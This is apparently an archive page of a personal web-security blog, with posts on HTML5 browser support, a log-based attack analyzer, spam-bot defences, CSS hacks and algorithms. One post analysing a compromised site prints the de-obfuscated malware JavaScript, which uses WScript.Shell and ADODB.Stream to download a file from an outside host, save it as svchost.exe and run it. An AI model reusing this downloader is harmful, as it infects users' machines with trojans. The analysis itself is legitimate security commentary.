Subscribe to the RSS feed

Friday, March 13 2009

HTML 5 current browsers implementation support

Firefox 3.1beta has been released today, with the support of two HTML 5: audio and video.

Gareth and I exchanged some messages on twitter+ about the current support of HTML 5 by the different engines. The first document I found (well, asking on the #whatwg IRC chan) is the Comparison of layout engines you can find on Wikipedia; they also pointed me to a wiki that WhatWG maintains: Implementations in Web browsers.

These are pretty incomplete documents and decided then, to create a mapping of the current WhatWG document and and the support of the browsers. This is possible because in the current document, they report the implementation status of the different items.

Anyway, here is a table, I assembled, containing the last information about the HTML5 implementations in the current browser engines.

I also want to say that even if the WASC Script Mapping project has looked quite inactive for some time now, I will definitely continue it. I'm actually waiting to finish a couple of other projects I participate to, especially the WASC Threat Classification 2 and the Web Application Security Scanner Evaluation Criteria. I expect to get started again to Script Mapping during this summer...

EDIT: I will maintain the current list of HTML5 implementation in current browsers: HTML5. March 30.

+ twitter is quite cool to follow/interact, feel free to follow me at @rgaucher

Tuesday, January 13 2009

CIA spamming security groups: Be a part of a mission that’s larger than all of us.

Hello Romain,

The Central Intelligence Agency would like you to consider a career with the National Clandestine Service. The CIA’s National Clandestine Service seeks qualified applicants to serve our country’s mission abroad. Our careers offer rewarding, fast-paced, and high impact challenges in intelligence collection on issues of critical importance to US national security. Applicants should possess a high degree of personal integrity, strong interpersonal skills, and good written and oral communication skills. We welcome applicants from various academic and professional backgrounds. Do you want to make a difference for your country? Are you ready for a challenge?

All applicants for National Clandestine Service positions must successfully undergo several personal interviews, medical and psychological exams, aptitude testing, a polygraph interview, and a background investigation. Following entry on duty, candidates will undergo extensive training. US citizenship required. An equal opportunity employer and a drug-free work force.

For more information and to apply, visit: www.cia.gov

You can make a world of difference.

Com'on guys, I'm not even US citizen... So yeah, CIA is looking for security guys by spamming on linkedin groups. Anything wrong in that process?

Tuesday, September 16 2008

Scalp 0.4: apache log based attack analyzer, updated

Some time ago, I released a first version of a tool named Scalp. The tool analyzed the Apache HTTPD logs in order to examine if there were attacks or not. The attack detection is based on the rules provided by the PHP-IDS project.

Today, I took time to finalize a bit more the Python version of Scalp. The version 0.4 can now be downloaded on the project web page.

This version includes a couple of features such as:

  • Output in HTML, XML or TEXT format
  • Specify the output directory
  • Using a random sample for scanning the log file
  • Trying to decode the potential attack vectors
  • Returning the lines that couldn't be examined

And then, with some other options that already existed in the previous versions,

  • Select a time frame
  • Select classes of potential attacks

the tool seems to approach a final version.

I won't add more into it since I want to keep it simple and quite fast (I may add optimization if I find some). Also, the C++ version is on its way and mostly done with same amount of options, the code is checkable using the google repository, but I still have to work on options and time-frame specification.

Scalp 0.4:

Wednesday, September 10 2008

PyQt and WebKit integration: unexpected limitation [fixed]

For the one that don't know Qt, this is a huge and mature framework for developing GUI & more on different platform (to read, multi-platform). I already did some development using Qt and C++ (especially when I was working at the GERAD).

As, with Marcin, we wanted to have a look at some technologies that involved a browser etc. I decided to look at Qt and the almost-fresh WebKit integration.

The integration of WebKit in a framework like Qt, allows the developer to embed supposedly in a easy manner a browser that supports the basic web technologies which are HTML, CSS and JavaScript (it seems that Flash is going to be supported soon, and anyway, one can write its own plugin in order to interact with some specific content) in its application.

And indeed it is easy... I used PyQt in order to develop a very simple prototype and see what we are able to do with this new technology. As I know already Python and Qt, it was easy to me to start and be kinda effective. So, in few hours of work, documentation reading and trying to understand why and how the Python version of Qt was using such or such thing compared to the C++ version, I got this workable browser that allows dynamic JavaScript injection through a console, view the source and a simple encoding converter (click on the image to see the full screen-shot):



At this point, I was actually very excited, less than 500 lines of Python in order to create that... was kinda worth few days of work in order to create a useful tool: the Swiss Army Knife of the Pen-Test.

My next and logic step was to extend the current tool in order to have the tamper-data like capabilities (eg. being able to hijack the HTTP request and then tampering the GET/POST data).

And here come the problems... it's apparently not possible to get the current request then reply when using the WebKit widget in Qt (QWebView). I tried to use a delegate QNetworkAccessManager in order to overload the POST/GET request since this object is use to set the proxies etc. but nothing... I think they just didn't open this possibility for some reason.

Oh well, I then stop developing this prototype and will try to contact Qt experts/developers just to figure out if there is no other way to do it. I thought of a solution which would be to have my own HTTP manager using QHttp in order to do the request, get the response etc. and then sending the content to the browser; this would be great in a webapps scanner, but for the use that I wanted with, that would create huge limitation for the user-interaction and especially for Ajax applications. So, the prototype stays here until I find a solution or Qt open their network management under the QWebView widget...


Fixed:

An update to let you know that I actually fixed the problem, it was really stupid from me, but I should really care when the method are virtual or not before overloading it or not :/ shame on me!

So now, I am able to have a firefox/tamper-data/firebug in one tool :)

Wednesday, August 13 2008

And so you wanted to protect your email address on your website...

People start thinking of how to prevent spam when they're building website, that's a fact and that's very good indeed. The only problem is when they don't actually know how a bot would handle the HTML page...

For instance, I was surfing on qik.com and saw this little piece of JavaScript in order to protect the exposure of the email address:

<script type="text/javascript">
//<![CDATA[
  document.write('<a href="mailto:XXXX@qik.com"\
    title="Send us an email!">XXXX@qik.com<\/a>');
//]]>
</script>

As the readers of this blog may know, the bot process is really easy.... download the HTML page (crawling) and then trying to extract the email address (parsing). This is just obvious that a bot wouldn't bother with the CDATA tag or because this is embedded in a JavaScript code, if I would have to do a bot, nonetheless I would have a very lossy parsing in order to gather as much information as possible, but I wouldn't care about "in which context am I?". Also, according to some testing I'm doing, I can tell you have if this was a URL, the Google bots would get them...

So please, obfuscate just a bit this... some example can be found on fuckthespam.com

Monday, July 28 2008

Trie based fast and massive replacement (Algorithm)

While working on the C++ version of scalp, I had to do massive simple transformations of a given text, ie. replacements of words by others.

Since the main way to do this (a loop which does a replacement at the time), is very inefficient, I decided to find something faster. I then came up with a tree based replacement algorithm; I believe this is kinda famous but I never heard about such algorithm, it basically uses a non compact trie in order to have an efficient search of the current word.

The main algorithm is very simple and similar to a state machine where the state depends on the next character in the trie. For example, if we want to to replace the words: "ba", "me", "mp" in a text, the trie will be this following one:

The idea is then to iterate over all the characters in the text, and for each letter determines whether this is a possible word to replace or not (simply by looking if the letter is a child of the trie root). Then, we iterate over the next letters in the text in order to see if the sequence of letters are an actual word to replace or not (every time, the same methodology is used: look in the children at the current state of our iterator in the trie).

This algorithm seems more efficient than the simple replace used in a loop since we will perform a descent in a tree and therefore replace a linear search by a logarithm one.


I ran a little statistical comparison between two algorithms: mine and the simple loop one. The test bed is quite simple and uses randomly generated text which contains the words to replace with a certain density. In order to create statistics, I made all the sizes varying and I aggregated the results from the same dictionary size. So, for a given size of a dictionary (let's say, 200 words to replace), a text has been generated with a density that vary from 0.1 to 0.5 (from 10% to 50% of the words in the text will be words to replace) and finally, the size of the text vary from 25 to 200 words (and words are randomly generated to be from a size 5 to 32).
As I said previously, the results from a same dictionary size has been aggregated since I've seen practically that the result mainly depends on the dictionnary size (it also obviously depends on the size of the text, but as this is a constant for the 2 algorithm, I can compute the mean of the different data to extract the average gain for a particular dictionary size).

Finally, here is the curve that shows the logarithm progress of the gain compared to the classical method):

The reference replace implementation which has been compared to the one I developed is the following (STL/C++ implementation):

void str_replace(string& where, const string& what, const string& by) {
  for (string::size_type i  = where.find(what);
                                 i != string::npos;
                                 i  = where.find(what, i + by.size()))
    where.replace(i, what.size(), by);
}
and has been used M times (M is the size of the dictionary).
I also decided to release a very-early version of this replace algorithm (which is not template yet): stree.h which use the great STL friendly tree structure from Kasper Peeters.

As for data information, the here is the code I used to generate the dictionary, and text with a certain density: genRandData.cpp

Tuesday, May 20 2008

ph34r the script kiddies: Whitehouse.org

I was just reading this news (reported by Kanedaa), decided to look closer to the content of this "malware" stuff to see if there was some nice techniques behind this so called "attack".

Oh men! How disappointing to see that this was done by script kiddies... the "obfuscation" consist of 3 levels of URL encoded javascript... yeah... URL encoding is for sure an obfuscation very hard to prettify. And the final code was just not obfuscated either... Just this:

function myCreateOB(o, n) {
    var r = null;
    try { eval('r = o.CreateObject(n)') }catch(e){}
    if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){} }
    if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}}
    if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}}
    if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}}
    if (! r) {try { eval('r = o.GetObject(n)') }catch(e){}  }
    return(r);
}

function Go(a) {
    var s = myCreateOB(a, "WS"+"cr"+"ip"+"t.S"+"he"+"ll");
    var o = myCreateOB(a, "AD"+"OD"+"B.St"+"re"+"am");
    var e = s.Environment("Process");
    var xml = null;
     var url = 'http://ad.ox88.info/bbs.jpg';
    var bin = e.Item("TEMP") + "svchost.exe";
    var dat;
    try { xml=new XMLHttpRequest(); }
    catch(e) {
        try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHT"+"TP"); }
        catch(e) {
            xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
        }
    }
    if (! xml) return(0);
    xml.open("GET", url, false)
    xml.send(null);
    dat = xml.responseBody;

    o.Type = 1;
    o.Mode = 3;
    o.Open();
    o.Write(dat);
    o.SaveToFile(bin, 2);

    s.Run(bin,0);
}

function mywoewd() {
    var i = 0;
    var ss11='{7F5B7F';
    var ss12='63-F06';
    var ss13='F-4331-8A';
    var ss14='26-339E0'
    var ss15='3C0AE3D}';
    var ss1=ss11+ss12+ss13+ss14+ss15
    var ss2="{BD96"+"C55"+"6-65A3-1"+"1D0-98"+"3A-00C04F"+"C29E36}";
    var ss3="{AB9"+"BCEDD-E"+"C7E-47"+"E1-93"+"22-D4"+"A210617116}";
    var ss4="{00"+"06F"+"033-000"+"0-0000-C0"+"00-00000"+"0000046}";
    var ss5="{0006"+"F03A-0000-00"+"00-C000-00"+"00000"+"00046}";

    var t = new Array(ss1,ss2,ss3,ss4,ss5,null);
    while (t[i]) {
        var a = null;
        if (t[i].substring(0,1) == '{') {
         a = document.createElement("object");
         a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
        } else {
            try { a = new ActiveXObject(t[i]); } catch(e){}
        }
        if (a) {
            try {
                var b = myCreateOB(a, "WSc"+"rip"+"t.Sh"+"ell");
                if (b) {
                    Go(a);
                    return(0);
                }
            } catch(e){}
        }
        i++;
    }
}

As reported by Trend Micro, this is supposed to be a download of the trojan: TROJ_DELF.GKP ... that doesn't mean anything to me but anyway, my AV didn't detect it :)

Thursday, May 1 2008

Accelerate the convergence to the bug: Running the test in 16-bit

Yesterday, I came across a case in a piece of software which was really hard for me to understand perfectly. Not only the code is well written (which is always worse for finding bugs :)) but the structure is also well thought (this is the implementation of an associated array in C in the lighttpd application).

The problem I had was to state whether a tool report was a true-positive/false-positive. So, as in many case I've seen in this software a problem may occur only in the limit cases. This one may occur after INT_MAX insertion in the structure. I don't know if one of you ever tried to do such a thing, but only INT_MAX (~2 billions on typical PC) allocations is a lot, so inserting elements in a structure that needs at least 5 (re)allocations is too much. But well, I did it. Also, I ran this test with valgrind using the memory leak check (full check and high definition).

I then ran a simple test program to fill this structure in a real condition: a typical x86/32-bit architecture. As I knew it was stupid and didn't even think this could end before 2 days I started looking in other direction in order to reduce the INT_MAX size for having a reasonable time execution of the test.


My first attempt is to shift all the types that are used, I knew this was not perfect because even if I can force my program to use unsigned short instead of size_t, I wouldn't change the size of the pointers, a char * would still b 32-bit (there may be some options in gcc to control the size of the pointers — which I doubt — but I didn't find any). Using this methodology, I was able to make the program crash in the way that would have been a real true-positive.


But as I knew it was not good since the size of the pointers are not modified and I had the feeling that in that particular structure, the case of the possible crash is handled by itself (due to pointer and type limits), I started looking in other direction for running that program in 16-bit, a pseudo-real-16-bit-mode. I then started looking into emulators and how to compile code for 16-bits and running it on my linux (x86/32-bit). After having issues compiling and running the test program with the gnu-m68hc11 ELF package, I found the bcc/elksemu stuff. After compiling and running with ELKS utilities, the test program didn't crash, it only failed in an assertion test after an allocation...


Different behavior, with different methods, okay... which is the correct one? Is it a problem of pointer size that made the test running differently than the real program on a 32-bit or maybe a limitation of the elksemu machine? As this morning I checked the state of the 32-bit run I launched yesterday, and this was finished... ended by a failed assertion.

As expected, pointer size matters when you wanna test on intrinsic limitations of a structure and its behavior using limit cases.

Monday, March 17 2008

Untrusted websites passwords

After using different password, it's really bothering to have lots of diversity; you need to remember them or well, store them in a password.txt

I just made a simple script for my own in order, from mostly the same password, to generate different ones for different websites... This is not that big deal, just a simple script to do that, but I thought it could have been useful for some of you...

You can reach the script here: Untrusted websites passwords creator

Wednesday, January 30 2008

Definition parsing: first step done

Since I started to work on my static analyzer using php-ast/oracle, I realized that looking for vulnerabilities need a lot of hard coded/database entries. This is really sad, since, in order to get something correct you would need a huge knowledge database. So I started thinking of generalization of vulnerabilities and way to express it. It's tough. Really.

The most realistic (if I can say so) idea I had is to actually handle vulnerabilities definition using a given taxonomy. I still need a lot of knowledge, especially on the language (PHP) I'm analyzing, especially the output functions, global variable, filters, resources etc. but the big advantage with rules is that you can generalize the definition.

Anyway, I started dealing with natural language, will try to make this fitting into my model in order to communicate with the future static analyzer engine of php-oracle... and thanks to the AIMA project, I was able to get some fast results on the processing:

# source definition:
unvalidated input go to sink in html context
# parse tree:
2 possiblities
##
  02NP[('Adjective', 'unvalidated'), ('Noun', 'input')][]
      23VP[('Verb', 'go')][]
        45NP[('Noun', 'sink')][]
       ('Preposition', 'to')
      35PP[]
     
    25VP[]
      68NP[('Name', 'html'), ('Noun', 'context')][]
     ('Preposition', 'in')
    58PP[]
   
  28VP[]

08S[]
##
  02NP[('Adjective', 'unvalidated'), ('Noun', 'input')][]
    23VP[('Verb', 'go')][]
        45NP[('Noun', 'sink')][]
          68NP[('Name', 'html'), ('Noun', 'context')][]
         ('Preposition', 'in')
        58PP[]
       
      48NP[]
     ('Preposition', 'to')
    38PP[]
   
  28VP[]
 
08S[]

And the taxonomy I used is the following (which needs to be extended to handle more than "input validation"):

IV = Grammar('InputValidation',
	Rules(
		S = 'NP VP | S Conjunction S',
		NP = 'Pronoun | Noun | Article Noun | Adjective Noun | NP PP | NP RelClause | Name Noun',
		VP = 'Verb | VP NP | VP Adjective | VP PP',
		PP = 'Preposition NP',
		RelClause = 'That VP'
	),
	Lexicon(
		Noun = "input | output | privilege | context | header | user | sink | file",
		Verb = "is | go | write | print",
		Adjective = "validated | unvalidated | asynchronous",
		Pronoun = "me | you | i | it",
		Name = "html | database | http | sql | ldap",
		Article = "the | a | an",
		Preposition = "to | in | on",
		Conjunction = "and | or | but | not",
		That = "that"
	))

Now, I only have to finish my model of a vulnerability (I do not think about building something really general, but a model that can handle injection flaws, privilege, communication would be awesome). Once this is finish, lots of things would be possible such as generating attacks directly from the definition (this would be more like a generalized attack generator) and vulns. checkers for the source code analyzer.

I know this is a kinda tough project and I really have lots of other things to do, but I really want to give this a try... just to see where it goes...

Tuesday, January 29 2008

Search engine keywords extraction

For fuckthespam!, I wanted to add a nice feature due to the content of this website: a listing of keywords that people used to come on this website.

Well, the code is pretty simple bust just wanted to share it; it's working for google, msn and yahoo (the 3 most important search engine), I don't really care about having everything and just wanted to share this PHP snippet.

$referer = $_SERVER["HTTP_REFERER"];
if (strpos($referer,"search") > 0) {
	// look for google, yahoo and MSN
	$key = 0;
	if (strpos($referer,"google.") > 0 || strpos($referer,"msn.") > 0)
		$key = "q";
	else if (strpos($referer,"yahoo.") > 0)
		$key = "p";

	if ($key) {
		$parse_url = parse_url (urldecode($referer));
		if (array_key_exists("query",$parse_url)) {
			$query = $parse_url['query'];
			// extract (.+)$key=(.*)&
			$t = explode("&", $query);
			foreach($t as $k=>$e) {
				if ($e[0] == $key && $e[1] == '=') {
					$k = "$key=";
					$keyword = str_replace($k,'',$e);
					if (strlen($keyword) > 2) {
						// $keyword is actually the whole content of the search
					}
					break;
				}
			}
		}
	}
}

Friday, January 25 2008

Protection against spam bot | fuckthespam.com

I used to work a bit on spam bot protection, whether it is for protecting the email disclosure or the spam in the website itself. I then, started a stupid website called http://fuckthespam.com where I will gather some spam (the funny one) but also listing some anti-spam techniques :)

Hopefully I will be able to also make an history of spam to see how techniques and also content evolved.

Wednesday, October 17 2007

IE6 And IE7 don't have compatible CSS tricks

It's so sad. As a web developer (sometimes), I used to do CSS and like almost all CSS developers you will have some trouble. A bad but fast solution I used to do is to duplicate CSS statement for IE, like this one:

body {
  background-color: green; /*  Green for everybody */
  _background-color: red; /*  Overload to red for Internet Explorer */
}

But this trick is not working anymore with IE7, it doesn't understand the underscore... the solution? Add a point!

body {
  background-color: green; /*  Green for everybody */
  _background-color: red; /*  Overload to red for Internet Explorer 6 */
  .background-color: blue; /*  Overload to blue for Internet Explorer 7 */
}

This is really sad! First of all, the old hack is well none and used... so, lots of CSS are actually not working like it should do with IE7. Why the heck they did that? Isn't Microsoft good are retro-compatibility? Thought so....

Wednesday, May 30 2007

Back to work!

And I've just received this book this morning:

Wednesday, April 11 2007

Pretty good CAPTCHA: Against the current OCR

Today, it reminds me a study from Cmabrigde (http://www.mrc-cbu.cam.ac.uk/~mattd/Cmabrigde/). The idea is that a human needs only few letters in order in a word to understand that word (this is not okay for every word, but it should not be hard to find them).
So the idea is basically to create a captcha as an image with a word, but the word would be disordered in a way that human can read it such as:

CNOTNENT
MANAEGR
KITHCEN
etc.


Okay, based on a current OCR based attack bot, it's doable if you have a dictionary then use something like the levenstein distance and try to minimize the distance with the current word in the dictionary and the word you found with your OCR.
But well, the captcha has not necessary one word...
The only problem I can see with this method is that the dictionary you use to generate the captcha should be in the language of the targeted human. But well, for most of the websites, you know what readers/users you have...

If I have time I'd try to create a lib for this...

Friday, March 30 2007

Firebug: XHR prototype overloading failure

I love firebug, this is something really good for developing web apps. But today, I got an issue which was pretty annoying! First of all, when I develop a small apps, I used to do this under firefox only with firebug and other nice extension loaded.
But today I got an issue when I wanted to overload the XMLHttpRequest send function to do other things with: Firebug simply do not allow me to do this, but it works well if I want to overload the 'open' function!

Pretty annoying but you cannot do this with firebug activated:

XMLHttpRequest.prototype.send = function(data) {
    sData = transformation(data);
    this.originalSend(sData);
}

Tuesday, March 27 2007

Obfuscation and Spam Bots: Update

Sven Vetsch/Disenchant has just send me an email with the Vigenere's version of the obfuscation script. This version is quite cute, but it's true that the public key is not secure enough... let's work on another version with public and private key!.

You can find Disenchant's script here.

Obfuscation and Spam Bots

Always on the same subject: Spam bots, i was thinking that obfuscation would be a good way to prevent spam bots. Then I first start playing with reverse strings even if it may be obvious for the bots but well, I'm pretty sure it's even more difficult than the previous technique which can almost be passed with an intelligent-but-with-no-javascript-support parser.

So this version is quite simple:

<script>
String.prototype.reverse = function() { return this.split('').reverse().join(''); };
function reverseNames() {
	formElement = document.forms[0].elements;
	for(var i = 0; i < formElement.length; i++)	{
		formElement[i].name = formElement[i].name.reverse();
	}
	formElement.submit();
}
</script>
...
<form method="post" action="check.php" onsubmit="reverseNames()">
	<label for="emanresu">&#8238;emanresu&#8237;</label> <input type="text" name="emanresu" />   <br />

You can find the running example: here.
While talking about obfuscation/crypto, since there are few parameters to obfuscate/encrypt maybe a Vigenere algorithm would be nice...

Note that we do not use the 'username' instance in the HTML page, if you want to print 'username' you can use the character &#8238; which reverses the following text.

Friday, March 23 2007

Prevent spam bots on a phpBB2

I used to talk about technique to prevent spam bots for registering or posting somewhere. Even though I think that a good solution for this is to create SessionID with JavaScript, I was a little bit stuck with phpBB2 because of the template engine, I cannot easily dynamically write a JavaScript in the page.

So, the solution I used is to simply create a CAPTCHA which is written in the page with JavaScript such as:

document.write("<input type='hidden' name='persoCaptcha' value='" + generateStaticKeyWord() + "' />");

And then, I had to check for this value in the PHP script.

Fairly simple, but it seems to work without lots of modification of the phpBB2 forum... Here is a list of spam bots that I detected with this technique on a forum. Even if this technique works for now, I will have to use a better one...

Wednesday, March 14 2007

.htaccess for protecting a content for thief

This a really nothing to do with web application security, but a friend asked me how to protect a bunch of html files in a directory. He was looking for sessions based solutions but for this he would have to rename the html files in php or whatever and then, implement the protection... pretty boring!
I suggest him a really easy and not perfect solution: checking the referer when accessing the html files (this is the kind of protection as the images anti-thief):

# .htaccess
# -------
RewriteEngine on
RewriteCond %{HTTP_REFERER} !.*yousite.com/.* [NC]
RewriteRule ^(.*)$ /fail.html [NC]

You can find an example here.

PS: this could not be a valid solution for lots of application!

Wednesday, February 28 2007

Firefox2 and the Weird JavaScript Events...

For almost a week, I've been working with zeno, wisec and others on JavaScript events and HTML Tags; what event can be executed in what tag...
The testing is definitely not finished but I was implementing a JavaScript Unit Testing based test bed for keeping everybody out of clicking on 8700 testcases * nb_browsers...

Anyway, the method I use is to fire a JavaScript event on the load of the document to verify if it works (the information are gathering by the JSUnit Framework).
So, the funny part in firefox is that I can fire almost every event in every tag; you can find an example here where I do something like that:

<acronym onsubmit="alert('TEST')">test</acronym>

The equivalent Internet Explorer version can be find here (it works well... ie does nothing).

I didn't really take the time to think about this but I'm sure something can come from this...

Edit: Wisec found that under firefox you can also fire every events on unexisting tags such as:

<unex ondblclick="alert('TEST')">test</unex >

Wednesday, February 21 2007

Spam bots protection 2: the trap

The previous article on spam bots was focus on using generation of the document itself by adding dynamic content (JavaScript) or a random fields... By the way, Jungsonn follows with a clever technique of the same kind.

Today, I was looking at the logs of a phpBB forum we have in an association where we have lots of spam; okay phpBB is famous and maybe not the most secure but well... there is some prevention (modules such as CAPTCHA) for this and the webmaster installed lots of them...
I was quickly able detect manually the bots actually, this is something like same processes even if they introduced lots of variations and of course a detection system cannot be time based because they prevent this.
So we can easily see that it's tricky to automatically detect a bot without learning machine, SVM etc. but it's not my point here.

If I cannot easily prevent them coming on the website or track them, I can at least manipulate in some way:
Fake login page which cannot be seen by a user (<a href="login.php?sid=THE SESSION ID" style="display:none">Login</a>; As display:none can be easily detected by the bots we can trick this with the JavaScript "expression" evaluation in CSS...) and in the fake page adding some information in the cookie/session such as SESSION['BOT'] = 'DETECTED' etc.
We also need a verification script embedded in every page which would do generate a blank page or something like that... Don't forget also to ban the IP address.

I will try to develop this idea and test it because now, I have no proof that it can work properly. Furthermore, it also need the bots not to support CSS a/o JavaScript.

Wednesday, January 31 2007

How to prevent spammers bot?

There is many ways to prevent spam from the bayesian tests (statistical tests) to the basic captcha ... But we all know that pictures captcha can be bypassed by OCR even if it can be quite tough, there is some sofwtare and articles (example here).
Well, let's talk about 2 other ways:

1. JavaScript version

Assuming that robots do not interpret JavaScript (which is probably true for most of the bots) it would be nice to have a hidden field filled by JavaScript. It's quite simple to make such a script:

var W3CDOM = (document.createElement);
var inputInserted = false;
function addInput() {
	if (!W3CDOM || inputInserted)
		return;
	// create the input form
	var hiddenInput = document.createElement('input');
	hiddenInput.type = "hidden";
	hiddenInput.name = "testBrowser";
	hiddenInput.value = "success";
	//now add the input to the DOM.
	document.forms[0].appendChild(hiddenInput);
	inputInserted = true;
}

Then, you test that the GET/POST('testBrowser') == 'success'; The input looks like that:

<input type="text" name="OneOfMyFields" onclick="addInput()" />

2. Script generated form

The idea is to create a form with one input which has different instances, let's say:

<input class='c1' type="text" name="login_1" value="" />
<input class='c2' type="text" name="login_2" value="" />
<input class='c3' type="text" name="login_3" value="" />

With your script, you choose a 'random' number from 1 to 3, create the good CSS style (hide the not chosen value). The script store in the a cookie /SESSION/JavaScript the value of the random number then check after with this value.
If another input than the good one is filled than this should be a automated thing...

These techniques are absolutely not perfect at all, for the first, the assumption is quite odd I mean than it's not too hard to build a bot which can handle javascript/css/dom etc. and for the second, the 3 inputs are not enough, you need at least 30 for a representative trust.

I <3 Bots!